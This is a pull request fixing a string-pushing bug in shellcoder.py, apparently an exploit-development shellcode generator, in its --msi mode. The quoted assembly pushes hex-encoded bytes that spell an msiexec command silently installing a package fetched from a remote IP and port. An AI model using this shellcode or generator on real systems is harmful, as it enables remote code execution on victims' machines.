### PR TITLE
Fix push_string in shellcoder.py that led to invalid opcodes

### DIFF
--- a/shellcoder.py
+++ b/shellcoder.py
@@ -57,7 +57,7 @@ def push_string(input_string):
             target_bytes = rev_hex_payload[i-8:i]
             instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
         # handle the left ofer instructions
-        elif ((0 == i-1) and ((i % 8) != 0) and rev_hex_payload_len != 8):
+        elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
             if (rev_hex_payload_len % 8 == 2):
                 first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                 first_instructions.append("push eax;")


### PR DESCRIPTION
Hey @epi052 ,

This is a quick fix to `shellcoder.py`'s `--msi` mode. Currently, if you try to execute it, you get an error:

```
Traceback (most recent call last):
  File "/home/kali/Desktop/tools/osed-scripts/shellcoder.py", line 669, in <module>
    main(args)
  File "/home/kali/Desktop/tools/osed-scripts/shellcoder.py", line 538, in main
    encoding, count = eng.asm(shellcode)
  File "/home/kali/.local/lib/python3.9/site-packages/keystone/keystone.py", line 213, in asm
    raise KsError(errno, stat_count.value)
keystone.keystone.KsError: Invalid operand (KS_ERR_ASM_INVALIDOPERAND)
```

I've traced it to the fault instructions generated here:

```
   call_system:                         
       xor eax, eax                    ;
       push eax                        ;
mov al, 0x;push eax;mov ax, 0x;push ax;push dword 0x6e712f20;push dword 0x582f3434;push dword 0x34343a31;push dword 0x39312e39;push dword 0x33322e38;push dword 0x36312e32;push dword 0x39312f2f;push dword 0x3a707474;push dword 0x6820692f;push dword 0x20636578;push dword 0x6569736d;
```

Notice `mov al, 0x` are invalid instructions. These were generated by `push_string` function at this branch: 

```
for i in range(rev_hex_payload_len, 0, -1):
        # add every 4 byte (8 chars) to one push statement
        if ((i != 0) and ((i % 8) == 0)):
            target_bytes = rev_hex_payload[i-8:i]
            instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
        # handle the left ofer instructions
        elif ((0 == i-1) and ((i % 8) != 0) and rev_hex_payload_len != 8):
            if (rev_hex_payload_len % 8 == 2):
                first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
                first_instructions.append("push eax;")
            elif (rev_hex_payload_len % 8 == 4):
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push eax;")
            else:
                target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
                first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
                first_instructions.append("push eax;")
                first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
                first_instructions.append("push ax;")
            null_terminated = True
```

Presumably, the check `elif ((0 == i-1) and ((i % 8) != 0) and rev_hex_payload_len != 8)` is meant to catch strings of length multiple 8 and thus do not have any left over instructions. However, `rev_hex_payload_len != 8` only catches the case `8`, when it should be `(rev_hex_payload_len % 8) != 0` to catch all multiples of 8. This led to the invalid opcodes being generated.

With this one liner change, the `--msi` generation now works properly. I've re-tested both generation modes to ensure they still work on Windows as expected.

Thanks!